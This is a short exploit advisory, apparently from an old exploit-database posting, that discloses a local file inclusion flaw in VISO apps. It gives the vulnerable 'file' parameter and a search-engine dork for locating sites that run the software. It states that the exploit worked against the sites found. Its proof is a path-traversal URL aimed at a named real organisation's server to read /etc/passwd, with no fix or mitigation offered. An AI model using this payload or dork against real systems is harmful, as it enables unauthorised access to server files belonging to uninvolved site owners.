# Title : VISO apps Local File Inclusion Vulnerability # Description : VISO apps is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. #Software: : http://www.viventus.no/visoapps/ # Author : d3hydr8 # Homepage : http://www.darkc0de.com # Original Post : # Vuln: : /index.php?file=[LFI] #Dork: : intext:"This site is powered by V I S O" *Only 2 results but both worked # Proof : http://www.njff.no/index.php?file=../../../../../../../../../../etc/passwd *insource: